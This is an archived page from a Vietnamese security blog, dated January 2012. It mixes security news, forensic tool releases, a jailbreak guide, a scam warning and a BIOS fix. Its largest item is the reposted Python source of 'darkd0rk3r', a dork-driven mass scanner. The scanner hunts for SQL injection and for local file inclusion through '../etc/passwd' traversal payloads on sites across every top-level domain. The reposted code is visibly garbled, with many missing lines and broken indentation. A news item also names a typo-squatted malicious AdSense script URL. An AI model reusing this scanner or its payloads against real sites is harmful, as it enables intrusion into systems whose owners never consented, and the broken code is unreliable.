Tổng quát về Tội phạm máy tính

- Khái niệm - Đặc điểm - Tính chất

Tố giác tội phạm máy tính như thế nào?

Cách thức, thể thức và trình tự

Miễn phí bản quyền phần mềm

Tập hợp bản quyền miễn phí theo ngày

30 January 2012

[Tool] slowhttptest 1.4

[Security] $100 in Google Adword vs Facebook Ads


[Security] Rootkit has rhythm by H-Security

A critical flaw in Windows multimedia library "winmm.dll" is already being actively exploited to spread rootkits, according to a warning from the anti-virus experts at Trend Micro. Attackers are embedding specially crafted MIDI files into web pages with are then opened by Internet Explorer using a plugin from Windows Media Player. The sound of background music covers the MIDI file using the vulnerability to execute shell code which installs a rootkit onto the system.

Attackers takes advantage of "heap spraying" where they copy their code onto the application's heap several times. They then write long sequences of NOP instructions with their malicious code at the end. The hope is that the application will trip on the heap and will end up jumping somewhere into the long NOP sequences where it will slide down the sequence (hence the name "NOP Slide") until it lands on, and runs, the malicious code.

The flaw affects all versions of Windows except Windows 7 – Microsoft closed the vulnerability two weeks ago in January's Patch Tuesday. Those who have not yet installed the patches should install them as soon as possible because, with the help of a freely available Metasploit module, it is simple to create a matching exploit.


29 January 2012

[Forensic] Mobius Forensic Toolkit 0.5.11

This release features 14 new registry reports:
IE download folder
IE typed URLs
MRU files opened/saved
MRU files executed
search assistant
printer ports
all devices
enumerated devices
HID devices
network devices
stream devices.
Minor improvements were made.Donload: http://download.savannah.gnu.org/releases/mobiusft/

[Source] Dark D0rk3r 0.5

# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname        : darkd0rk3r.py
# Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version         : 0.5
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft and all members of ex darkc0de.com, ljuska.org 

import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
from random import choice

# Colours
W  = "\033[0m";  
R  = "\033[31m"; 
G  = "\033[32m"; 
O  = "\033[33m"; 
B  = "\033[34m";

# Banner
def logo():
  print R+"\n|---------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com                                      |"
        print "|   01/2012     darkd0rk3r.py  v.0.5                            |"
        print "|                                                               |"
        print "|---------------------------------------------------------------|\n"
  print W

if sys.platform == 'linux' or sys.platform == 'linux2':
  subprocess.call("clear", shell=True)
  subprocess.call("cls", shell=True)
log = "darkd0rk3r.txt"
logfile = open(log, "a")
lfi_log = "darkd0rk3r-lfi.txt"
lfi_log_file = open(lfi_log, "a")
threads = []
finallist = []
vuln = []
timeout = 300

lfis = ["/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]

sqlerrors = {'MySQL': 'error in your SQL syntax',
             'MiscError': 'mysql_fetch',
             'MiscError2': 'num_rows',
             'Oracle': 'ORA-01756',
             'JDBC_CFM': 'Error Executing Database Query',
             'JDBC_CFM2': 'SQLServer JDBC Driver',
             'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
             'MSSQL_Uqm': 'Unclosed quotation mark',
             'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
             'MS-Access_JETdb': 'Microsoft JET Database',
             'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
             'Server Error' : 'Server Error',
             'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
             'Invalid Querystring' : 'Invalid Querystring',
             'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
             'VBScript Runtime' : 'VBScript Runtime',
             'ADODB.Field' : 'ADODB.Field',
             'BOF or EOF' : 'BOF or EOF',
             'ADODB.Command' : 'ADODB.Command',
             'JET Database' : 'JET Database',
             'mysql_fetch_array()' : 'mysql_fetch_array()',
             'Syntax error' : 'Syntax error',
             'mysql_numrows()' : 'mysql_numrows()',
             'GetArray()' : 'GetArray()',
             'FetchRow()' : 'FetchRow()',
             'Input string was not in a correct format' : 'Input string was not in a correct format',
             'Not found' : 'Not found'}

header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
          'Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
          'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
    'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
    'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:',
    'Microsoft Internet Explorer/4.0b1 (Windows 95)',
    'Opera/8.00 (Windows NT 5.1; U; en)',
    'amaya/9.51 libwww/5.4.0',
    'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
    'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
    'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao',
           'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb',
           'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo',
           'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd',
           'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr',
           'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do',
           'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi',
           'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf',
           'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs',
           'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu',
           'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it',
           'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn',
           'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk',
           'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me',
           'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr',
           'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc',
           'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz',
           'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn',
           'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru',
           'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj',
           'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy',
           'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm',
           'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug',
           'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi',
           'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com',
           'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel',
           'name', 'aero', 'asia', 'cat', 'coop', 'jobs', 'mobi', 'museum',
           'pro', 'travel'],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr',
           'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil',
           'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia',
           'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']}
stecnt = 0
for k,v in domains.items():
  stecnt += 1
  print str(stecnt)+" - "+k
sitekey = raw_input("\nChoose your target   : ")
sitearray = domains[domains.keys()[int(sitekey)-1]]

inurl = raw_input('\nEnter your dork      : ')
numthreads = raw_input('Enter no. of threads : ')
maxc = raw_input('Enter no. of pages   : ')
print "\nNumber of SQL errors :",len(sqlerrors)
print "Number of LFI paths  :",len(lfis)
print "Number of headers    :",len(header)
print "Number of domains    :",len(v)
print "Number of threads    :",numthreads
print "Number of pages      :",maxc
print "Timeout in seconds   :",timeout
print ""

def search(inurl, maxc):
  urls = []
  for site in sitearray:
    page = 0
      while page < int(maxc):
  jar = cookielib.FileCookieJar("cookies")
  query = inurl+"+site:"+site
  results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'
  request_web =urllib2.Request(results_web)
  agent = random.choice(header)
  request_web.add_header('User-Agent', agent)
  opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
  text = opener_web.open(request_web).read()
  stringreg = re.compile('(?<=href=")(.*?)(?=")')
        names = stringreg.findall(text)
        page += 1
        for name in names:
    if name not in urls:
      if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
      elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name):
  percent = int((1.0*page/int(maxc))*100)
  urls_len = len(urls)
  sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))
  tmplist = []
  print "\n\n[+] URLS (unsorted): ",len(urls)
  for url in urls:
      host = url.split("/",3)
      domain = host[2]
      if domain not in tmplist and "=" in url:
  print "[+] URLS (sorted)  : ",len(finallist)
  return finallist

class injThread(threading.Thread):
        def __init__(self,hosts):
                self.fcount = 0
                self.check = True

        def run (self):
                urls = list(self.hosts)
                for url in urls:
                                if self.check == True:

        def stop(self):
                self.check = False
class lfiThread(threading.Thread):
        def __init__(self,hosts):
                self.fcount = 0
                self.check = True

        def run (self):
                urls = list(self.hosts)
                for url in urls:
                                if self.check == True:

        def stop(self):
                self.check = False
def ClassicINJ(url):
        EXT = "'"
        host = url+EXT
                source = urllib2.urlopen(host).read()
                for type,eMSG in sqlerrors.items():
                        if re.search(eMSG, source):
                                print R+"\nw00t!,w00t!:", O+host, B+"Error:", type

def ClassicLFI(url):
  lfiurl = url.rsplit('=', 1)[0]
  if lfiurl[-1] != "=":
    lfiurl = lfiurl + "="
  for lfi in lfis:
      check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
      if re.findall("root:x", check):
  print R+"\nw00t!,w00t!: ", O+lfiurl+lfi

def injtest():
  print B+"\n[+] Preparing for SQLi scanning ..."
  print "[+] Can take a while ..."
  print "[!] Working ..."
  i = len(usearch) / int(numthreads)
  m = len(usearch) % int(numthreads)
  z = 0
  if len(threads) <= numthreads:
    for x in range(0, int(numthreads)):
      sliced = usearch[x*i:(x+1)*i]
      if (z<m):
  z +=1
      thread = injThread(sliced)
    for thread in threads:
def lfitest():
  print B+"\n[+] Preparing for LFI scanning ..."
  print "[+] Can take a while ..."
  print "[!] Working ..."
  i = len(usearch) / int(numthreads)
  m = len(usearch) % int(numthreads)
  z = 0
  if len(threads) <= numthreads:
    for x in range(0, int(numthreads)):
      sliced = usearch[x*i:(x+1)*i]
      if (z<m):
  z +=1
      thread = lfiThread(sliced)
    for thread in threads:

usearch = search(inurl,maxc)
menu = True
while menu == True:
  print R+"\n[1] SQLi Testing"
  print "[2] LFI Testing"
  print "[3] SQLi and LFI Testing"
  print "[4] Save valid urls to file"
  print "[5] Print valid urls"
  print "[6] Found vuln in last scan"
  print "[0] Exit\n"
  chce = raw_input(":")
  if chce == '1':
  if chce == '2':
  if chce == '3':
  if chce == '4':
    print B+"\nSaving valid urls ("+str(len(finallist))+") to file"
    listname = raw_input("Filename: ")
    list_name = open(listname, "w")
    for t in finallist:
    print "Urls saved, please check", listname
  if chce == '5':
    print W+"\nPrinting valid urls:\n"
    for t in finallist:
      print B+t
  if chce == '6':
    print B+"\nVuln found ",len(vuln)

  if chce == '0':
    print R+"\n[-] Exiting ..."
    mnu = False
  Source: http://packetstormsecurity.org/files/109171/darkd0rk3r-0.5.py.txt

27 January 2012

[RAT] Phòng ngừa Facebook Spam Worm như thế nào?

Biểu hiện của Spam facebook worm ?
- Post 1 stt, cmt hoặc 1 loạt  stt, cmt có nội dung tương tự lên list friend và tag những friend đó (Bạn có thể là người nhận hoặc người gửi) - Hiện nay là dạng Video.
- Cụ thể cách lây lan như thế nào thì bạn đọc bài sau: kiem-tien-tu-spam-facebook.html

Khi chưa biết mình có dính worm ko?
- Hãy cảnh giác với các trang web cung cấp video giật gân hay những câu chuyện bất thường, kỳ lạ (ví dụ như: Video thác loạn của ca sỹ này, diễn viên kia..., hoặc scandal, cảnh nóng .v.v.)
- Chú ý nguồn gốc các trang video: Thông thường bạn bè của bạn sẽ chọn những trang cung cấp, chia sẻ video uy tín như: Youtube, Zing chẳng hạn....
- Chú ý trong Accept friend - chỉ add những người mà bạn quen: Tránh tư duy theo kiểu: Mình và người add mình có 5 bạn chung: có nghĩa là chúng ta quen nhau :)
- Sử dụng Antivirus + Update liên tục :)

Khi đã dính Worm
- Kiểm tra trình duyệt của bạn plug-in, add-on (Mozilla Firefox), extension (Google Chrome) v.v và loại bỏ những add-on lạ
- Kiểm tra và disable các ứng dụng (app) trên facebook mà bạn nghi ngờ.
- Thay đổi mật khẩu của tài khoản facebook - và các tài khoản khác nếu bạn sử dụng chung 1 mật khẩu
- Quét virus :)

P/S: Từ bài sau sẽ trình bày câu cú hơn....... - Bài này lát edit lại

[Security] Facebook Spam vs $$$$$$$$$

Lâu rồi, Xnohat có phân tích 1 em malware chuyên đi spam các facebook khác.. .. . Hôm nay tình cờ đọc được 1 bài trên Fsecure mô tả chi tiết hoạt động của nó

Mọi người vào ngâm cứu và tìm ra 1 hướng riêng cho mình :)))

[Security] Facebook Fakebook: New Trends in Carberp Activity by David Harley

This month we discovered some new facts relating to Win32/Carberp trojan activity. We have spent a lot of time writing about Carberp already, but interesting information is still coming to light. The first interesting information to attract our attention recently concerned stealing money from Facebook users. Before then we hadn’t seen Carberp activity targeting social network users. The scheme used here for financial fraud is simple: if the victim attempts to log in to Facebook, he sees instead a fake Facebook page displaying the message “Your Facebook account is temporary locked!”

Figure 1: Fake Facebook Lockout

The fine print tells the victim to enter details of a "20 euro Ukash voucher" which can be purchased at ukash.com, assuring the victim that "20 euro will be added to your Facebook main account balance." If the victim enters information considered to be invalid – i.e. doesn’t take the hint and supply details for a 20 Euro Ukash voucher to “confirm verification” – then the following warning message is displayed, insisting that a valid Ukash voucher number be entered:

Figure 2: Demanding e-Cash

This sample of Carberp doesn’t include bootkit code, but in user-mode the injected module looks the same as the latest sample that does include the bootkit (http://blog.eset.com/2011/12/04/carberp-blackhole-growing-fraud-incidents). The most interesting detail of this behavior is that this is not a new version/modification of the Carberp trojan, but simply a special configuration file that contains the full html code for the fake Facebook page. The decrypted configuration file contains only one web-injection rule for Facebook: *//*facebook.com/*

Figure 3: Faking Facebook

According to our data Carberp’s main activity is confined to the region of Russia and the former Soviet republics, and this activity centered on fraud targeting the major Russian banks and stealing money from RBS (Remote Banking Service) systems. Figure 4 shows the directory loaded with fresh files to introduce web-injects into online banking systems from the C&C panel:

Figure 4: Web-Injects

Up to now we hadn’t seen Carberp activity targeting the users of social networks, but it’s not so hard to add this functionality by introducing changes into the updated configuration file. Carberp intercepts many system functions and fraud functionality depend only on the rules for web-injects run from the configuration file or from special plugins. The Russian Federation is not the only country where this malware family is active. At this moment we know the facts of fraud related to the following banks based in non-Russian regions: Bank of America, CityBank, HSBC, CHASE, Nordea. But as before, the Russian Federation is the main region targeted by the Carberp attacks.

In early December, we noted an increase in the number of detections in the territory of Russia and the former Soviet republics (http://blog.eset.com/2011/11/21/evolution-of-win32carberp-going-deeper). But this trend can be seen in the statistics for December 2011 and late January 2012:

Figure 5: Carberp Detection in Russia

The Russian Federation is the country where the largest number of installations of Carberp has been seen, as confirmed by the statistics below:

Figure 6: Global Infection Statistics

Another interesting fact concerns a new DDoS plugin (Win32/Mishigy.AB) for Carberp. This DDoS plugin was developed in Delphi 7 and based on the network components from the Synapse TCP/IP library. Synapse components are very popular among cybercriminals for the creation of DDoS bots. A memorable example of a popular DDoS bot family based on this component is Win32/Delf.PYI (also known as a Dirt Jumper bot). The DDoS module provides the following types of attacks:
HTTP/HTTPS attacks
GET/POST attacks
download flood attacks

In order to bypass DDoS prevention systems multiple types of user-agents and legitimate web resources are used in the referrer string.

Figure 7: Bypassing DDoS Prevention Systems

Carberp is one of the biggest botnets in Russian Federation and total number of active bots is estimated to number millions of infected hosts. In the hands of the Carberp cybercrime group the DDoS module will be an effective means of attacking cybercrime groups, competing for the profits from malicious exploitation of online banking.

Our research continues …

Aleksandr Matrosov
David Harley


26 January 2012

[RAT] Ngồi nhặt sạn ở báo Dantri :)) - Bài Internet 2011 qua các con số

Ngồi đi lướt báo thấy cái này
Nhìn lại gì đó........ trên dantri

Nguồn của số liệu này đã được mình post tham khảo từ trước tết ở bài: Thống kê: Internet 2011 qua các con số
Có 1 số lỗi nhỏ trong type: chắc chủ định của tác giả hoặc biên tập viên muốn kiểm tra xem độc giả của Dantri có phải là những người chịu khó đọc không? Lượng độc giả có nhiều không? hay chỉ là dạng lướt tiêu đề rồi NEXT :)
Thử check tiếp 1 tẹo xem... Google nhé :)

Đây là kết quả:... rất khiêm tốn: 62 kết quả chính xác sử dụng đúng title trên

---Chưa xem xét việc change title.

Có thể thấy, 1 lỗi nhỏ nhưng hậu quả có thể rất lớn - Chắc tại mình mắc bệnh hay phóng đại mọi thứ :)))

[Forensic] Mobius Forensic Toolkit 0.5.10

Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tools.

25 Jan 2012 22:15
Release Notes: This release features 14 new registry reports: autorun, services, IE download folder, IE typed URLs, MRU files opened/saved, MRU files executed, search assistant, printer ports, processors, all devices, enumerated devices, HID devices, network devices, and stream devices. Minor improvements were made

[Tool] Acunetix WVS 8 Released Candidate 2012

The accuracy of Script Checks has been increased. The Acunetix development team is dedicated to continuously improve scan detection of security checks.
The Graphical User Interface (GUI) has been enhanced in order to make menu navigation and usage easier and more effective than ever before.
SSL security audit script is launched automatically when scanning a HTTPS website, regardless if port scanning is enabled or not.
Added a number of new SQL Injection variants checks.

Bug Fixes:
HPP detection security script failed when testing input scheme with excluded variants
Apply settings button not showing up in specific cases
Fixed several issues related to pausing and resuming of crawler
Fixed several issues when running multiple instances of the reporter
Two backup files were being generated because of filename case insensitivity
Filtering of wildcards from robots.txt

Download Acunetix WVS 8 Released Candidate  vulnerabilityscanner8.exe


Timeshare owners across the country are being scammed out of millions of dollars by unscrupulous companies that promise to sell or rent the unsuspecting victims' timeshares. In the typical scam, timeshare owners receive unexpected or uninvited telephone calls or e-mails from criminals posing as sales representatives for a timeshare resale company. The representative promises a quick sale, often within 60-90 days. The sales representatives often use high-pressure sales tactics to add a sense of urgency to the deal. Some victims have reported that sales representatives pressured them by claiming there was a buyer waiting in the wings, either on the other line or even present in the office.

Timeshare owners who agree to sell are told that they must pay an upfront fee to cover anything from listing and advertising fees to closing costs. Many victims have provided credit cards to pay the fees ranging from a few hundred to a few thousand dollars. Once the fee is paid, timeshare owners report that the company becomes evasive – calls go unanswered, numbers are disconnected, and websites are inaccessible.

In some cases, timeshare owners who have been defrauded by a timeshare sales scheme have been subsequently contacted by an unscrupulous timeshare fraud recovery company as well. The representative from the recovery company promises assistance in recovering money lost in the sales scam. Some recovery companies require an up-front fee for services rendered while others promise no fees will be paid unless a refund is obtained for the timeshare owner. The IC3 has identified some instances where people involved with the recovery company also have a connection to the resale company, raising the possibility that timeshare owners are being scammed twice by the same people.

[Lượm] VMWare Tools on VMWare Player 4.x

With the introduction of VMWare Player 4.0, VMWare Player seems to no longer automates certain aspects of the VMWare Tools Install process. Therefore, you will need to take a few additional steps in order to properly install VMWare Tools on your viaExtract Virtual Machine.

Upon initially opening the Virtual Machine, select Install VMWare Tools from the Virtual Machine tab at the top of the Virtual Machine. Select OK at the next message and a CD Icon Should appear on your Desktop. Double click the icon to open up the media window. This ensures that the CD has properly mounted and we can continue with the command line prompts. Open a Terminal Window (The Black Icon box at the top of your Virtual Machine and enter the following command.
cd /media/VMware\ Tools/
Next run:
You should see 2 files. One is a manifest.txt file and the other is a VMWare tar file. Take note of the version in the file name. The version we installed is v8.8.1-528969 because it is the latest version of VMWare Tools. Should a newer version get released, that file name will change and you will have to change the next command accordingly. Run the following command. Please ensure that the version listed in the command is the exact same as the file listed from the previous “ls” command.

cp VMwareTools-8.8.1-528969.tar.gz /home/analyst/Downloads/

The reason we have to copy the file out is because VMWare player mounts the install CD as Read-Only, meaning we can’t issue our install commands from this location. Once the file has finished copying, run:

cd /home/analyst/Downloads/
You will now be in your Downloads folder. From here we can now unpack that tar file so we can actually install VMWare Tools. Run the following command.

tar xvf VMwareTools-8.8.1-528969.tar.gz
Again, if a newer version of VMWare Tools is released, you will have to change that command accordingly to match the exact version VMWare Player is attempting to install. Once the tar file finishes unpacking (The command prompt “$” will return), you will need to enter the folder that was just created. Run:

cd vmware-tools-distrib/
Once inside that directory, execute the following commands and VMWare Tools will begin installing.
**For advanced users: If you wish to change some of the default install directories, remove the –default from the following command. Only change the directories if you know exactly what you are doing though)
sudo ./vmware-install.pl –default
This process should take a minute or so. Once you see the command prompt, VMWare Tools should have successfully installed. Restart the VM to ensure their connectivity, and you can now begin using viaExtract.

25 January 2012

[Security] SQL Injection Cheat sheet


[Security] Compromised Chrome Plugin Forum

This morning Websense® ThreatSeeker® Network alerted us that if a user enters the term "Download Chrome" in Google Search, the 36th result would result in potentially malicious content being downloaded to the user's machine.

I'll briefly describe the attack vector in which the content is sent to the user.

Web Search

Search for "Download Chrome":

The 36th result leads to a compromised, unofficial Google Chrome plugin Web page:

Compromised Web site
The 36th result leads to to this website:

The above site:

is a legitimate, unofficial Google Chrome plugin forum Web page which is pulling in content from two malicious Web sites. We believe this Web page was compromised.

One indicator that this is a compromised site, as opposed to a site set up for strictly malicious purposes, is that the whois registration information, which helps indicate the reputation, is registered in 2008. The registration details also seem to indicate that real information was provided. Again, this isn't a 100%, foolproof indication that the site was compromised, but it does help as circumstantial evidence.


Looking at the source code of this Web page, we see that the page redirects the user's browser to two malicious Web sites:
1) pagead2.googlesyndlcation.com/pagead/show_ads.js (via JavaScript include - this is a Google AdSense typo-squatted URL!)

2) best-videogames.com (via iframe html tag include - results in a server 503 = Service unavailable)

This redirection diagram shows the content the user is served by visiting the Chrome Plugin forum Web page. All this content is served to the user without the user having to click on anything at all (except for the link from Google search):

Google AdSense Typo-Squatted URL
The fake AdSense show_ads.js links to a typo-squatted URL where the whois record shows that it's clearly not a site owned by Google Inc.

Notice the details:

The real Google hosting server for show_ads.js is pagead2.googlesyndication.com (notice the letter "l" changed out for the letter "i" in the word "syndication").

I have archived a copy of the fake show_ads.js here in case you wish to research the compromised site a bit further.

Websense customers are protected from these threats by ACE™, our Advanced Classification Engine.

[Jailbreaking] your iPhone 4S or iPad2 5.0.1

Been waiting for this one for awhile. Awesome job from the dev-team on releasing a jailbreak for the iPhone 4S and iPad2. Real easy:
First thing, make sure you are on 5.0.1

Download: http://jailbreaktools.com/downloads/osx/absinthe-

Unzip. On OSX Lion I had a “Absinthe quit unexpectedly”. If you run into this, open up a terminal and cd into the root directory of the directory that has Absinthe.app. Do not go into the directory and type: sudo ./Absinthe.app/Contents/MacOS/Absinthe

It will restart a few times, you probably should remove your passcode lock as it can hose the install process. Once it reboots, go to your home screen on the iPhone and look for the Absinthe icon. Click on that (may need to wait a couple minutes for 3G to connect) and it'll reboot. You should now have Cydia in place.

[Tool] Oxygen Forensic Suite 2012 v.4.0.1

New in Oxygen Forensic Suite 2012 v.4.0.1:
Applications. Added support for SkyFire Web Browser user data for Apple devices. It allows to examine the web history and saved bookmarks.

Applications. Added support for Touch application user data for Android OS and Apple devices. It permits to view the friend’s list, chats, shared photos, comments, etc.

IPD Viewer. Added ability to convert the selected text.

Added support for 80 new Android OS devices. The total amount of supported devices is 2800.

General. Removed restriction on working with the program database stored in the network.

Device Extraction Wizard. Accelerated Device Extraction Wizard loading.

Calendar. Improved Unicode support.

Desktop. Improved Unicode support for Device notes.

Export. Interface improvements.

Web Connections and Location Services, Locations. Now only figures can be entered in Accuracy filter.

Export. Fixed problem with exporting and printing of all the data from Desktop.

Database. Fixed problem with network database conversion on the program start.

Messages. Fixed problem with messages extraction from Blackberry devices.

Sqlite Viewer. Fixed problem with wrong Unix Epoch Time (ms) format conversion.

Plist Viewer. Fixed problem with wrong OS X Epoch format conversion.

Google Mail. Fixed problem when the data was not shown after device acquisition.

Communication Statistics. Fixed problem that occurred after switching to Search data bookmark.

[Fix] Chassis intruded ! Fatal Error System Halted

Gặp lỗi này thì làm như sau

Lượm 1
trường hợp của bạn là bạn chỉ cắm đường quạt trên cổng điện quạt cho cpu còn 1 đường nguồn quạt cho chipset bạn để trống nên nó báo vậy , bạn vào bios disable cái quạt system đi là oke .
trường hợp 2 . có thể jumper đường Open case bạn chưa cắm hoặc đang để chế độ open ,
trường hợp 3 cable IDE cắm thiết bị ổ nhưng lại set là slave
trường hợp 4 vẫn chỉ là set chức năng chưa hợp lý trong bios

Lượm 2

Problem “Chassis Intruded ! Fatal Error ….. System Halted.” Note : Mother Board most be out of electricity in all of these steps.
Check if your PC Chassis is closed “A sensor on the chassis most be pushed when closing the cover”.
If the problem persist check the Chassis intrusion Jumper on your Mother Board “See the manual user for your Mother Board before removing or changing the place of any Jumper” a jumper most be placed on the in Pin-1 and Pin-2 this is the right jumper position to deactivate the chassis intrusion option after that you should remove the CMOS battery and Clear the CMOS settings by placing the CRLTC jumper on pin 2 and pin 3 for almost 10 Seconds then place it again between Pin 1 and Pin 2 after that put the CMOS battery then start your pc and check if the problem persist again.
If non of that work and still have the same problem so this is the final solution. People who want do it should have some electronic repair knowledge on remmoving dead Micro Chips.

Lượm 3

Clear CMOS
Change RAM Slots
Change chassis intrusion position jumper
If possible load system defaults of your BIOS
Ngoài lề

Sơ đồ chân của C.I
1 2 3 4
* * * *
+Chân 2: No conection
+Chân 3 : Chassis Signal
+Chân 4: Ground
+Default : chân 3 và 4 nối nhau bởi 1 jumper, tức không sử dụng tính năng Chasis Alarm. Lúc này máy sẽ không bị tình trạng báo lỗi Chassis fault.
+Nếu sử dụng Chasis Alarm thì chân 3 sẽ được dùng nối với 1 tín hiệu bên ngoài, nếu mở thùng máy thì chân 3 sẽ mức cao "high-level signal ", khi đó bôt máy sẽ bị báo Chassis fault. Khi đóng thùng máy thì chân 3 sẽ được nối đất (gần giống chân 3 nối với chân 4)

Tham khảo một số hình sau:

[RAT] Chúc mừng năm mới - Nhâm Thìn - 2012

Do một chút sự cố về con Desktop nên giờ mới có điều kiện online :)

Chúc độc giả của Toiphammaytinh có 1 năm mới sức khỏe, ấm áp và vững tin về một năm tài chính ổn định :)

Về bản thân bài viết trên Toiphammaytinh vẫn theo 2 hướng chính

- Điểm mặt 1 số tin tức về Security, Forensic
- Cung cấp cho độc giả các tài liệu về khoa học pháp lý liên quan đến tội phạm máy tính (hay phổ biến hiện nay gọi là Tội phạm sử dụng công nghệ cao) - Chứng cứ - lý luận .v.v

19 January 2012

[Security] What's hot at AVAST Software

The second week of January 2012 started with amazing growth in terms of numbers for AVAST Software. Numbers and stats might not sound that “hot” and maybe you are wondering why I would write a blog post about it, but these numbers are REALLY HUGE and it is YOU – our avast! Community – who greatly helped us to achieve such results. Look at this:

1. Over 500,000 – fans of the avast! antivirus official page on Facebook.

In comparison: in January 2011, we had approximately 50,000 fans. Without investing any money into advertising, this number multiplied by 10! Actually I should say that YOU multiplied this number for us. Well done, guys! What is truly amazing about it is not only how quickly the number of new fans grew, but also how involved our fans are.:)

2. Over 1,000,000 people installed on their smartphones avast! Free Mobile Security – the new anti-theft and anti-malware app from AVAST Software – in just 16 days. I believe that no further comment is required about this.

3. Last but not least, we have reached 190,000,000 software user registrations and we are getting close to 150,000,000 active avast! users (those who have received at least 1 virus database update within the last 30 days). More live stats at: http://www.avast.com/facts

So here’s a big thank you to all our online communities – throughout the universe. Thank you for using and recommending avast! Antivirus, helping each other, and bringing fresh ideas to continually improve avast! antivirus solutions. Without you, we would have no purpose.


[Security] World IPv6 Launch on 6 June

